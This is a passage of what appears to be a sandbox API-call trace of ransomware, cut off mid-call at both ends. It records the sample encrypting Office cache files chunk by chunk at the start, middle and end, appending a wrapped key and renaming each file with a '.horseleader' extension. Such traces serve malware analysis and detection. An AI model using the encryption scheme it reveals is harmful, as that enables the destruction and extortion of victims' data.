(in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.560] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.563] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.564] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.564] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xf0b00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.564] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.578] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.578] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.578] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1e1600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.578] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.586] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.586] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.586] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.586] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.587] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.587] CloseHandle (hObject=0x21c) returned 1 [0219.587] GetProcessHeap () returned 0x780000 [0219.587] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.587] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.horseleader") returned 93 [0219.587] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.horseleader")) returned 1 [0219.588] GetProcessHeap () returned 0x780000 [0219.588] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.588] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87abdaa0, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x87abdaa0, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5cd2aa0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0219.588] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Windows") returned -1 [0219.589] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0219.589] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".horseleader") returned 0x0 [0219.589] lstrcmpW (lpString1="Office32WW.xml", lpString2="#Decrypt#.txt") returned 1 [0219.589] lstrcmpW (lpString1="Office32WW.xml", lpString2="_uninstalling_.png") returned 1 [0219.589] lstrlenW (lpString=".testttjffg") returned 11 [0219.589] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpSrch=".testttjffg") returned 0x0 [0219.589] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.589] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.589] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.590] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0219.590] StrStrW (lpFirst="Office32WW.xml", lpSrch=".txt") returned 0x0 [0219.590] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=4274) returned 1 [0219.590] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x10b2, lpOverlapped=0x0) returned 1 [0219.628] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffef4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.628] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x10b2, lpOverlapped=0x0) returned 1 [0219.628] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.628] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.628] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.628] CloseHandle (hObject=0x21c) returned 1 [0219.628] GetProcessHeap () returned 0x780000 [0219.629] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.629] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.horseleader") returned 93 [0219.629] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.horseleader")) returned 1 [0219.629] GetProcessHeap () returned 0x780000 [0219.629] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.629] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe57f8e0, ftCreationTime.dwHighDateTime=0x1cbe1cb, ftLastAccessTime.dwLowDateTime=0xfe57f8e0, ftLastAccessTime.dwHighDateTime=0x1cbe1cb, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0219.629] lstrcmpiW (lpString1="ose.exe", lpString2="Windows") returned -1 [0219.629] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0219.629] StrStrIW (lpFirst="ose.exe", lpSrch=".horseleader") returned 0x0 [0219.630] lstrcmpW (lpString1="ose.exe", lpString2="#Decrypt#.txt") returned 1 [0219.630] lstrcmpW (lpString1="ose.exe", lpString2="_uninstalling_.png") returned 1 [0219.630] lstrlenW (lpString=".testttjffg") returned 11 [0219.630] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe", lpSrch=".testttjffg") returned 0x0 [0219.630] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.630] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.630] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.630] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0219.630] StrStrW (lpFirst="ose.exe", lpSrch=".txt") returned 0x0 [0219.630] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=174440) returned 1 [0219.630] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.630] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.650] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.650] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.651] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12cb4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.651] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.672] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.672] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.672] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x25968, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.672] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.675] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.675] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.675] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.675] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.675] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.675] CloseHandle (hObject=0x21c) returned 1 [0219.676] GetProcessHeap () returned 0x780000 [0219.676] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.676] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.horseleader") returned 86 [0219.676] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.horseleader")) returned 1 [0219.677] GetProcessHeap () returned 0x780000 [0219.677] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.677] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6644b620, ftCreationTime.dwHighDateTime=0x1cb04b2, ftLastAccessTime.dwLowDateTime=0x6644b620, ftLastAccessTime.dwHighDateTime=0x1cb04b2, ftLastWriteTime.dwLowDateTime=0xa81b8770, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0219.677] lstrcmpiW (lpString1="osetup.dll", lpString2="Windows") returned -1 [0219.677] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0219.677] StrStrIW (lpFirst="osetup.dll", lpSrch=".horseleader") returned 0x0 [0219.677] lstrcmpW (lpString1="osetup.dll", lpString2="#Decrypt#.txt") returned 1 [0219.677] lstrcmpW (lpString1="osetup.dll", lpString2="_uninstalling_.png") returned 1 [0219.677] lstrlenW (lpString=".testttjffg") returned 11 [0219.677] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll", lpSrch=".testttjffg") returned 0x0 [0219.677] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.677] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.677] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.678] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0219.678] StrStrW (lpFirst="osetup.dll", lpSrch=".txt") returned 0x0 [0219.678] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=7378792) returned 1 [0219.678] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.678] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.680] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.680] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.681] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3823b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.681] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.683] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.683] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.683] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x704768, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.683] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.688] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.688] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.688] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.688] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.688] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.689] CloseHandle (hObject=0x21c) returned 1 [0219.689] GetProcessHeap () returned 0x780000 [0219.689] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.689] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.horseleader") returned 89 [0219.689] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.horseleader")) returned 1 [0219.690] GetProcessHeap () returned 0x780000 [0219.690] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.690] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8238e540, ftCreationTime.dwHighDateTime=0x1cb147f, ftLastAccessTime.dwLowDateTime=0x8238e540, ftLastAccessTime.dwHighDateTime=0x1cb147f, ftLastWriteTime.dwLowDateTime=0xa5ddcc70, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0219.690] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Windows") returned -1 [0219.690] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0219.690] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".horseleader") returned 0x0 [0219.690] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="#Decrypt#.txt") returned 1 [0219.690] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="_uninstalling_.png") returned 1 [0219.690] lstrlenW (lpString=".testttjffg") returned 11 [0219.690] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpSrch=".testttjffg") returned 0x0 [0219.690] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.690] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.690] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.691] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0219.691] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".txt") returned 0x0 [0219.691] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=36233052) returned 1 [0219.691] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.691] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.695] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.695] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.695] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x11447ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.695] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.700] SetFilePointerEx (in: hFile=0x21c, 